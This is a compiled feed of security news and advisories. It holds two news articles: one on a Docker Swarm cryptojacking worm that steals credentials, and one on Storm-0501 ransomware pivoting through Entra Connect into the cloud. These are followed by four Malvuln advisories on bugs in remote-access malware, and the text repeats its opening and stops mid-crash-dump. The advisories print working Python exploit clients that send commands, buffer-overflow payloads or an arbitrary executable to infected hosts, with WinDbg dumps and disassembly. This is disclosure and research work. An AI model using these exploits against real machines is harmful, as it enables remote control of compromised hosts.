Cybersecurity researchers have uncovered a new cryptojacking campaign targeting the Docker Engine API with the goal of co-opting the instances to join a malicious Docker Swarm controlled by the threat actor.
This enabled the attackers to "use Docker Swarm's orchestration features for command-and-control (C2) purposes," Datadog researchers Matt Muir and Andy Giron said in an analysis.
The attacks

Cybersecurity researchers have uncovered a new cryptojacking campaign targeting the Docker Engine API with the goal of co-opting the instances to join a malicious Docker Swarm controlled by the threat actor.

This enabled the attackers to "use Docker Swarm's orchestration features for command-and-control (C2) purposes," Datadog researchers Matt Muir and Andy Giron said in an analysis.

The attacks leverage Docker for initial access to deploy a cryptocurrency miner on compromised containers, while also fetching and executing additional payloads that are responsible for conducting lateral movement to related hosts running Docker, Kubernetes, or SSH.

Specifically, this involves identifying unauthenticated and exposed Docker API endpoints using Internet scanning tools, such as masscan and ZGrab.

On vulnerable endpoints, the Docker API is used to spawn an Alpine container and then retrieve an initialization shell script (init.sh) from a remote server ("solscan\[.\]live") that, in turn, checks if it's running as the root user and tools like curl and wget are installed before downloading the XMRig miner.

Like other cryptojacking campaigns, it makes use of the libprocesshider rootkit to hide the malicious miner process from the user when running process enumerating tools like top and ps.

The shell script is also designed to fetch three other shell scripts – kube.lateral.sh, spread\_docker\_local.sh, and spread\_ssh.sh – from the same server for lateral movement to Docker, Kubernetes, and SSH endpoints on the network.

Spread\_docker\_local.sh "uses masscan and zgrab to scan the same LAN ranges \[...\] for nodes with ports 2375, 2376, 2377, 4244, and 4243 open," the researchers said. "These ports are associated with either Docker Engine or Docker Swarm."

"For any IPs discovered with the target ports open, the malware attempts to spawn a new container with the name alpine. This container is based on an image named upspin, hosted on Docker Hub by the user nmlmweb3."

The upspin image is designed to execute the aforementioned init.sh script, thus allowing the group's malware to propagate in a worm-like fashion to other Docker hosts.

What's more, the Docker image tag that's used to retrieve the image from Docker Hub is specified in a text file hosted on the C2 server, thereby allowing the threat actors to easily recover from potential takedowns by simply changing the file contents to point to a different container image.

The third shell script, spread\_ssh.sh, is capable of compromising SSH servers, as well as adding an SSH key and a new user named ftp that enables the threat actors to remotely connect to the hosts and maintain persistent access.

It also searches for various credential files related to SSH, Amazon Web Services (AWS), Google Cloud, and Samba in hard-coded file paths within the GitHub Codespaces environment (i.e., the "/home/codespace/" directory), and if found, uploads them to the C2 server.

In the final stage, both the Kubernetes and SSH lateral movement payloads execute another shell script called setup\_mr.sh that retrieves and launches the cryptocurrency miner.

Datadog said it also discovered three other scripts hosted on the C2 server -

*   ar.sh, a variant of init.sh that modifies iptables rules and clears logs and cron jobs to evade detection
*   TDGINIT.sh, which downloads scanning tools and drops a malicious container on each identified Docker host
*   pdflushs.sh, which installs a persistent backdoor by appending a threat-actor-controlled SSH key to the /root/.ssh/authorized\_keys file

TDGINIT.sh is also notable for its manipulation of Docker Swarm by forcing the host to leave any existing Swarm it may be part of and add it to a new Swarm under the attacker's control.

"This allows the threat actor to expand their control over multiple Docker instances in a coordinated fashion, effectively turning compromised systems into a botnet for further exploitation," the researchers said.

It's currently not clear who is behind the attack campaign, although the tactics, techniques, and procedures exhibited overlap with those of a known threat group known as TeamTNT.

"This campaign demonstrates that services such as Docker and Kubernetes remain fruitful for threat actors conducting cryptojacking at scale," Datadog said.

"The campaign relies on Docker API endpoints being exposed to the Internet without authentication. The malware's ability to propagate rapidly means that even if the chances of initial access are relatively slim, the rewards are high enough to keep cloud-focused malware groups motivated enough to continue conducting these attacks."

The development comes as Elastic Security Labs shed light on a sophisticated Linux malware campaign targeting vulnerable Apache servers to establish persistence via GSocket and deploy malware families such as Kaiji and RUDEDEVIL (aka Lucifer) that facilitate distributed denial-of-service (DDoS) and cryptocurrency mining, respectively.

"The REF6138 campaign involved cryptomining, DDoS attacks, and potential money laundering via gambling APIs, highlighting the attackers' use of evolving malware and stealthy communication channels," researchers Remco Sprooten and Ruben Groenewoud said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Cryptojacking Attack Targets Docker API to Create Malicious Swarm Botnet

Microsoft warns that ransomware group Storm-0501 has shifted from buying initial access to leveraging weak credentials to gain on-premises access before moving laterally to the cloud.

Source: Vitali Gulenok via Alamy Stock Photo

Adversaries have caught on to the complexity that cybersecurity teams face in securing hybrid cloud environments — the latest of which is a particularly odious group tracked as "Storm-0501," a cash-grab operation that regularly targets the most vulnerable organizations, including schools, hospitals, and law enforcement across the US.

Storm-0501 has been around since 2021, according to a new report from Microsoft Threat Intelligence, operating as affiliates of a variety of ransomware-as-a-service (RaaS) strains including BlackCat/ALPHV, LockBit, and Embargo.

Notably, Microsoft has observed a shift in approach by the ransomware group. Once reliant on buying initial access from brokers, Storm-0501 has more recently found success exploiting hybrid cloud environments with weak passwords and overprivileged accounts. They first crack into the on-premises environment at a target, then pivot to burrow into the cloud, as seen in one campaign that successfully targeted Entra ID credentials.

**Microsoft Entra Connect Credential Crack**

The Microsoft team detailed a recent attack from Storm-0501 threat actors that used compromised credentials to access Microsoft Entra ID (formerly Azure AD). This on-premises Microsoft application is responsible for synching passwords and other sensitive data between objects in Active Directory and Entra ID, which essentially allows a user to sign in to both on-premises and cloud environments using the same credentials.

Once Storm-0501 was able to move laterally into the cloud, it was able to tamper with and exfiltrate data, set up persistent backdoor access, and deploy ransomware, the report warned.

"We can assess with high confidence that in the recent Storm-0501 campaign, the threat actor specifically located Microsoft Entra Connect Sync servers and managed to extract the plain text credentials of the Microsoft Entra Connect cloud and on-premises sync accounts," Microsoft reported. "Following the compromise of the cloud Directory Synchronization Account, the threat actor can authenticate using the clear-text credentials and get an access token to Microsoft Graph."

From there, an attacker can freely change the Microsoft Entra ID passwords of any hybrid, synced account.

But that's not the only way these slippery cybercriminals have found to vault from a compromised Entra ID account into the cloud. The second strategy is more complicated, as Microsoft detailed, and relied on breaching a domain admin account with a correlating Entra ID that is designated with global admin permissions. Additionally, the account needs to have multifactor authentication (MFA) disabled for the attackers to be successful.

"It is important to mention that the sync service is unavailable for administrative accounts in Microsoft Entra, hence the passwords and other data are not synced from the on-premises account to the Microsoft Entra account in this case," Microsoft said. "However, if the passwords for both accounts are the same, or obtainable by on-premises credential theft techniques (i.e. Web browsers' passwords store), then the pivot is possible."

Once it was in, Storm-0501 got busy setting up persistent backdoor access for later, working to achieve network control, and ensuring lateral movement to the cloud, Microsoft reported. Once that was done, they exfiltrated the files they wanted and deployed Embargo ransomware across the entire organization.

"In the cases observed by Microsoft, the threat actor leveraged compromised Domain Admin accounts to distribute the Embargo ransomware via a scheduled task named 'SysUpdate' that was registered via GPO on the devices in the network," according to the Microsoft report.

The two separate versions of attacks against Microsoft's Entra ID application demonstrate that cybercriminals of opportunity have focused in on hybrid cloud environments, and their big, fat attack surfaces, as easy wins.

**Securing the Hybrid Cloud Against Storm-0501 Attacks**

"As hybrid cloud environments become more prevalent, the challenge of securing resources across multiple platforms grows ever more critical for organizations," Microsoft's Threat Intel team warned.

Enterprise cybersecurity teams can achieve this by continuing to move toward a zero-trust framework, according to a statement from Patrick Tiquet, vice president, security and architecture, at Keeper Security.

"This model restricts access based on continuous verification, ensuring that users only have access to the resources essential for their specific roles, minimizing exposure to malicious actors," Tiquet explained via email. "Weak credentials remain one of the most vulnerable entry points in hybrid cloud environments, and groups like Storm-0501 are likely to exploit them."

Centralizing endpoint device management (EDM) is also "essential," he said. "Ensuring consistent security patching across all environments — whether cloud-based or on-premises — prevents attackers from exploiting known vulnerabilities."

Advanced monitoring will help teams spot potential threats across hybrid cloud environments before they can become a breach, he added.

Stephen Kowski, field CTO at SlashNext Security echoed many of the same recommendations in an emailed statement.

"This report highlights the critical need for robust security measures across hybrid cloud environments," Kowski said. "Security teams should prioritize strengthening identity and access management, implementing least privilege principles, and ensuring timely patching of Internet-facing systems."

In addition, he suggested shoring up security to protect against initial access attempts.

"Deploying advanced email and messaging security solutions can help prevent initial access attempts through phishing or social engineering tactics that often serve as entry points for these sophisticated attacks," he added.

Sloppy Entra ID Credentials Attract Hybrid Cloud Ransomware

Backdoor.Win32.Benju.a malware suffers from a remote command execution vulnerability.  This is the 700th release of a malvuln finding.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/88922242e8805bfbc5981e55fdfadd71.txtContact: malvuln13@gmail.comMedia: x.com/malvuln Threat: Backdoor.Win32.Benju.aVulnerability: Unauthenticated Remote Command ExecutionFamily: BenjuType: PE32MD5: 88922242e8805bfbc5981e55fdfadd71SHA256: 7d34804173e09d0f378dfc8c9212fe77ff51f08c9d0b73d00a19b7045ddc1f0e Vuln ID: MVID-2024-0700Disclosure: 09/27/2024Description: The RAT listens on TCP ports 200 and 15000. Third-party adversaries who can reach an infected host, can execute commands made available by the malware. Commands are sent in Spanish, using netcat or telnet fails to run cmds after connecting as they send CRLFs e.g. "quitar\r\n" fails "quitar" succeeds. Therefore, we need a custom client to send commands to the Benju RAT.Reiniciado = rebootquitar = terminate backdoorcerrarsesion = shutdownEnciendemonitor = turn on monitorapagamonitor = monitor offOcultaiconos = hide iconsactivachat = open chat windowBloquearaton = block ratDesbloquearaton = unblock ratActivainicio = activate startcerrarsesion = logoutOcultaiconosConectadoOcultado los iconoscerrarsesionConectadoCerrado la sesion de windowsEnciendemonitorConectadoMonitor encendidoapagamonitorConectadoMonitor apagadoquitarConectadoPc desinfectadoExploit/PoC:from socket import *import time,sysCMD=["Reiniciado","Enciendemonitor","apagamonitor","Ocultaiconos","Activainicio",          "activachat","Bloquearaton","Desbloquearaton","cerrarsesion","quitar"]def chk_res(s):    res=""    while True:        res += s.recv(512).decode()        if res:            break    return resdef Benju_Over(MALWARE_HOST, PTR):        PORT=200    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    print(CMD[PTR])    s.send("".encode())    print(chk_res(s))    PAYLOAD= CMD[PTR]   #Don't send CRLFs    s.send(PAYLOAD.encode())    time.sleep(0.5)    print(chk_res(s))    s.close()    print("[*] Benju (over) Rat PoC by malvuln")if __name__=="__main__":    c=-1    if len(sys.argv) < 3:        print("[+] Benju (over) Rat PoC by malvuln")        print("[+] Greetz Edu_Braun_0day, Indoushka, Todd J")        print("[!] Usage: Infected IP, Command")        print("[-]=============================")        for x in CMD:            c+=1            print("[+] "+str(c) + " "+ x)            exit()    try:        MALWARE_HOST=sys.argv[1]        PTR=int(sys.argv[2])        if MALWARE_HOST and PTR:            Benju_Over(MALWARE_HOST, PTR)    except Exception as e:        print("[!] "+str(e))        exit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Benju.a MVID-2024-0700 Remote Command Execution

Backdoor.Win32.Prorat.jz malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/277f9a4db328476300c4da5f680902ea.txt  
Contact: malvuln13@gmail.com  
Media: x.com/malvuln 

Threat: Backdoor.Win32.Prorat.jz  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The RAT listens on TCP ports 51100,5112,5110 and runs an FTP service. Prorat uses a vulnerable component in a secondary malware it drops on the victim system named "Netbot_Attacker VIP 6.0 Version korea.exe" MD5: 2168a606464c7fd016c260140a62815e. The dropped malware listens on TCP port 8080 and 80 on subsequent restarts. Third-party attackers who can reach an infected machine can send specially crafted sequential packetz to port 8080. This will trigger a stack buffer overflow overwriting the ECX, EIP registers and Structured Exception Handler (SEH).  
Family: Prorat  
Type: PE32  
MD5: 277f9a4db328476300c4da5f680902ea  
SHA256: 1134dffe52ea01f0d93a6889edd36620dbe9ee04224ad662e4f5463c4feb98a7   
Vuln ID: MVID-2024-0699  
Dropped files:  ~imsinst.exe, NetBot.ini  in  \AppData\Local\Temp directory.  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 09/27/2024

Memory Dump:  
(1974.354): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=41414141 edx=00000000 esi=00000000 edi=00000002  
eip=76fced3c esp=0703f8d0 ebp=0703f910 iopl=0         nv up ei pl nz ac po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212  
ntdll!ZwWaitForMultipleObjects+0xc:  
76fced3c c21400          ret     14h

0:008> .ecxr  
eax=00000000 ebx=04367000 ecx=41414141 edx=00000000 esi=04367000 edi=00406120  
eip=41414141 esp=0703ff80 ebp=0703ff94 iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
41414141 ??              ???

0:008> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for Netbot_Attacker VIP 6.0 Version korea.exe  
*** ERROR: Module load completed but symbols could not be loaded for Netbot_Attacker VIP 6.0 Version korea.exe

FAULTING_IP:   
+2f  
41414141 ??              ???

EXCEPTION_RECORD:  0703fad0 -- (.exr 0x703fad0)  
ExceptionAddress: 41414141  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000000  
   Parameter[1]: 41414141  
Attempt to read from address 41414141

PROCESS_NAME:  Netbot_Attacker VIP 6.0 Version korea.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAILED_INSTRUCTION_ADDRESS:   
+2f  
41414141 ??              ???

CONTEXT:  0703fb20 -- (.cxr 0x703fb20)  
eax=00000000 ebx=04367000 ecx=41414141 edx=00000000 esi=04367000 edi=00406120  
eip=41414141 esp=0703ff80 ebp=0703ff94 iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
41414141 ??              ???  
Resetting default scope

READ_ADDRESS:  41414141 

FOLLOWUP_IP:   
+2f  
41414141 ??              ???

ADDITIONAL_DEBUG_TEXT:  Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 41414141 to 41414141

FAULTING_THREAD:  ffffffff

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN

IP_ON_HEAP:  41414141  
The fault address in not in any loaded module, please check your build's rebase  
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may  
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

FRAME_ONE_INVALID: 1

STACK_TEXT:    
00000000 00000000 unknown!netbot_attacker_vip_6.0_version_korea.exe+0x0

STACK_COMMAND:  .cxr 000000000703FB20 ; kb ; ** Pseudo Context ** ; kb

SYMBOL_NAME:  unknown!netbot_attacker_vip_6.0_version_korea.exe

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: unknown

IMAGE_NAME:  unknown

DEBUG_FLR_IMAGE_TIMESTAMP:  0

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_c0000409_unknown!Unloaded

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE_MISSING_GSFRAME_BAD_IP_unknown!netbot_attacker_vip_6.0_version_korea.exe

Followup: MachineOwner  
---------

0:008> !exchain  
0703f988: ntdll!_except_handler4+0 (76fd6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (770157ad)  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *  
import time

MALWARE_HOST="x.x.x.x"  
PORT=8080  #80 after initial restart

def Prorat_BOF():

    print("[+] Backdoor.Win32.Prorat.jz")  
    print("[+] Remote Stack Buffer Overflow - SEH")  
    print("[+] MD5: 277f9a4db328476300c4da5f680902ea")

        for i in range(1, 13):  
        s=socket(AF_INET, SOCK_STREAM)  
        s.connect((MALWARE_HOST, PORT))  
        PAYLOAD="A"*100 * i  
        s.send(PAYLOAD.encode())  
        time.sleep(0.5)  
        print(len(PAYLOAD))  
        s.close()

if __name__=="__main__":  
    Prorat_BOF()  
    print("Malvuln")

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Prorat.jz MVID-2024-0699 Buffer Overflow

Backdoor.Win32.Amatu.a malware suffers from a remote arbitrary file write vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/1e2d0b90ffc23e00b743c41064bdcc6b.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.Amatu.aVulnerability: Remote Arbitrary File Write (RCE)Family: AmatuType: PE32MD5: 1e2d0b90ffc23e00b743c41064bdcc6bSHA256: 77fff9931013ab4de6d4be66ca4fda47be37b6f706a7062430ee8133c7521297Vuln ID: MVID-2024-0698Dropped files: mine.exeDisclosure: 09/27/2024Description: The malware listens on TCP port 2121. Third-party adversaries who can reach an infected host, can write arbitrary executable code to a file named "mine.exe" to SysWOW64 directory. The mine.exe  PE file executes immediately and runs as a child of the parent process malware. Amatu calls several Win32 APIs "GetSystemDirectoryA", "CreateFileA" and "WriteFile" to save the inbound code to disk. Finally, it calls "ShellExecuteA" executing the arbitrary PE file sent by the attacker. Setup a gateway and fake DNS sinkhole to mimic outbound internet access for the C2 or the port may not open."Amatu.a" disassemblycall    ds:GetSystemDirectoryA004A1FCB                 lea     ecx, [ebp+Source]004A1FD1                 push    ecx             ; Source004A1FD2                 lea     edx, [ebp+Buffer]004A1FD8                 push    edx             ; Destination004A1FD9                 call    strcat004A1FDE                 add     esp, 8004A1FE1                 push    offset aMine    ; "mine"004A1FE6                 lea     eax, [ebp+Buffer]004A1FEC                 push    eax             ; Destination004A1FED                 call    strcat004A1FF2                 add     esp, 8004A1FF5                 push    offset aExe     ; ".exe"004A1FFA                 lea     ecx, [ebp+Buffer]004A2000                 push    ecx             ; Destination004A2001                 call    strcat004A2022                 call    ds:CreateFileA 004A206B                 call    recv.004A2070                 mov     [ebp+nNumberOfBytesToWrite], eax.004A2076                 cmp     [ebp+nNumberOfBytesToWrite], 0push    eax             ; lpNumberOfBytesWritten004A209C                 mov     ecx, [ebp+nNumberOfBytesToWrite]004A20A2                 push    ecx             ; nNumberOfBytesToWrite004A20A3                 lea     edx, [ebp+buf]004A20A9                 push    edx             ; lpBuffer004A20AA                 mov     eax, [ebp+hFile]004A20B0                 push    eax             ; hFile004A20B1                 call    ds:WriteFilemov     ecx, [ebp+hFile]004A20BF                 push    ecx             ; hObject004A20C0                 call    ds:CloseHandle004A20C6                 push    1               ; nShowCmd004A20C8                 push    0               ; lpDirectory004A20CA                 push    0               ; lpParameters004A20CC                 lea     edx, [ebp+Buffer]004A20D2                 push    edx             ; lpFile004A20D3                 push    offset Operation ; "open"004A20D8                 push    0               ; hwnd004A20DA                 call    ds:ShellExecuteA004A20E0                 mov     eax, [ebp+s]004A20E3                 push    eax             ; s004A20E4                 call    closesocketExploit/PoC:1) Create a small PE file named "mine.exe", I used MASM and packed it with FSG."mine.exe" include \masm32\include\masm32rt.inc.dataHATE db "Masm32:", 0MyReal8 REAL8 123.456.data?aDword dd ?.codestart:  invoke MessageBox, 0, chr$("DOOM!"), addr HATE, MB_OK  mov eax, 123  exitend start2) Our custom client to send "mine.exe" to the remote infected host.from socket import *MALWARE_HOST="x.x.x.x"PORT=2121DOOM="mine.exe" def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Amatu.a MVID-2024-0698 Arbitrary File Write

Backdoor.Win32.Agent.pw malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/68dd7df213674e096d6ee255a7b90088.txt  
Contact: malvuln13@gmail.com  
Media: x.com/malvuln  

Threat: Backdoor.Win32.Agent.pw  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on TCP port 21111. Third-party attackers who can reach an infected machine can send specially crafted sequential packetz triggering a stack buffer overflow overwriting the ECX, EDI registers and Structured Exception Handler (SEH). Sending a packet containing the ascii character "A" or "41", registers are overwritten with "3431" as 4 is 34 hex and 1 is 31 hex. The lowercase character "R" consistently triggers an access violation with registers being overwritten with "r" 72 hex.  
Family: Agent  
Type: PE32  
MD5: 68dd7df213674e096d6ee255a7b90088  
SHA256: 2ba1d27325224407b6d57e0e8d141e3f301225d18a68bb5380c46287a0fc4441  
Vuln ID: MVID-2024-0697  
Dropped files:   
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 09/27/2024

Memory Dump:  
(1f90.1888): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=72727272 edx=040b1a3c esi=00000000 edi=00000002  
eip=76fced3c esp=0019de98 ebp=0019ded8 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
76fced3c c21400          ret     14h

0:000> .ecxr  
eax=025806f0 ebx=00000150 ecx=72727272 edx=040b1a3c esi=00000000 edi=72727272  
eip=00411515 esp=0019e54c ebp=0019e56c iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515:  
00411515 897904          mov     dword ptr [ecx+4],edi ds:002b:72727276=????????

0:000> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

FAULTING_IP:   
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515  
00411515 897904          mov     dword ptr [ecx+4],edi

EXCEPTION_RECORD:  0019e09c -- (.exr 0x19e09c)  
ExceptionAddress: 00411515 (Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x00011515)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 72727276  
Attempt to write to address 72727276

PROCESS_NAME:  Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  0019e0ec -- (.cxr 0x19e0ec)  
eax=025806f0 ebx=00000150 ecx=72727272 edx=040b1a3c esi=00000000 edi=72727272  
eip=00411515 esp=0019e54c ebp=0019e56c iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515:  
00411515 897904          mov     dword ptr [ecx+4],edi ds:002b:72727276=????????  
Resetting default scope

WRITE_ADDRESS:  72727276 

FOLLOWUP_IP:   
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515  
00411515 897904          mov     dword ptr [ecx+4],edi

FAULTING_THREAD:  00001888

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_72727272

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272

LAST_CONTROL_TRANSFER:  from 0040c987 to 00411515

STACK_TEXT:    
WARNING: Stack unwind information not available. Following frames may be wrong.  
0019e56c 0040c987 025805a8 0000003f 0019e5bc Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515  
0019e768 72727272 72727272 72727272 72727272 Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0xc987  
0019e76c 72727272 72727272 72727272 72727272 0x72727272  
0019e770 72727272 72727272 72727272 72727272 0x72727272  
0019e774 72727272 72727272 72727272 72727272 0x72727272  
0019e778 72727272 72727272 72727272 72727272 0x72727272  
0019e77c 72727272 72727272 72727272 72727272 0x72727272  
0019e780 72727272 72727272 72727272 72727272 0x72727272  
0019e784 72727272 72727272 72727272 72727272 0x72727272  
0019e788 72727272 72727272 72727272 72727272 0x72727272  
0019e78c 72727272 72727272 72727272 72727272 0x72727272  
0019e790 72727272 72727272 72727272 72727272 0x72727272  
0019e794 72727272 72727272 72727272 72727272 0x72727272  
0019e798 72727272 72727272 72727272 72727272 0x72727272  
0019e79c 72727272 72727272 72727272 72727272 0x72727272  
0019e7a0 72727272 72727272 72727272 72727272 0x72727272  
0019e7a4 72727272 72727272 72727272 72727272 0x72727272  
0019e7a8 72727272 72727272 72727272 72727272 0x72727272  
0019e7ac 72727272 72727272 72727272 72727272 0x72727272  
0019e7b0 72727272 72727272 72727272 72727272 0x72727272  
0019e7b4 72727272 72727272 72727272 72727272 0x72727272  
0019e7b8 72727272 72727272 72727272 72727272 0x72727272  
0019e7bc 72727272 72727272 72727272 72727272 0x72727272  
0019e7c0 72727272 72727272 72727272 72727272 0x72727272  
0019e7c4 72727272 72727272 72727272 72727272 0x72727272  
0019e7c8 72727272 72727272 72727272 72727272 0x72727272  
0019e7cc 72727272 72727272 72727272 72727272 0x72727272  
0019e7d0 72727272 72727272 72727272 72727272 0x72727272  
0019e7d4 72727272 72727272 72727272 72727272 0x72727272  
0019e7d8 72727272 72727272 72727272 72727272 0x72727272  
0019e7dc 72727272 72727272 72727272 72727272 0x72727272  
0019e7e0 72727272 72727272 72727272 72727272 0x72727272  
0019e7e4 72727272 72727272 72727272 72727272 0x72727272  
0019e7e8 72727272 72727272 72727272 72727272 0x72727272  
0019e7ec 72727272 72727272 72727272 72727272 0x72727272  
0019e7f0 72727272 72727272 72727272 72727272 0x72727272  
0019e7f4 72727272 72727272 72727272 72727272 0x72727272  
0019e7f8 72727272 72727272 72727272 72727272 0x72727272  
0019e7fc 72727272 72727272 72727272 72727272 0x72727272  
0019e800 72727272 72727272 72727272 72727272 0x72727272  
0019e804 72727272 72727272 72727272 72727272 0x72727272  
0019e808 72727272 72727272 72727272 72727272 0x72727272  
0019e80c 72727272 72727272 72727272 72727272 0x72727272  
0019e810 72727272 72727272 72727272 72727272 0x72727272  
0019e814 72727272 72727272 72727272 72727272 0x72727272  
0019e818 72727272 72727272 72727272 72727272 0x72727272  
0019e81c 72727272 72727272 72727272 72727272 0x72727272  
0019e820 72727272 72727272 72727272 72727272 0x72727272  
0019e824 72727272 72727272 72727272 72727272 0x72727272  
0019e828 72727272 72727272 72727272 72727272 0x72727272  
0019e82c 72727272 72727272 72727272 72727272 0x72727272  
0019e830 72727272 72727272 72727272 72727272 0x72727272  
0019e834 72727272 72727272 72727272 72727272 0x72727272  
0019e838 72727272 72727272 72727272 72727272 0x72727272  
0019e83c 72727272 72727272 72727272 72727272 0x72727272  
0019e840 72727272 72727272 72727272 72727272 0x72727272  
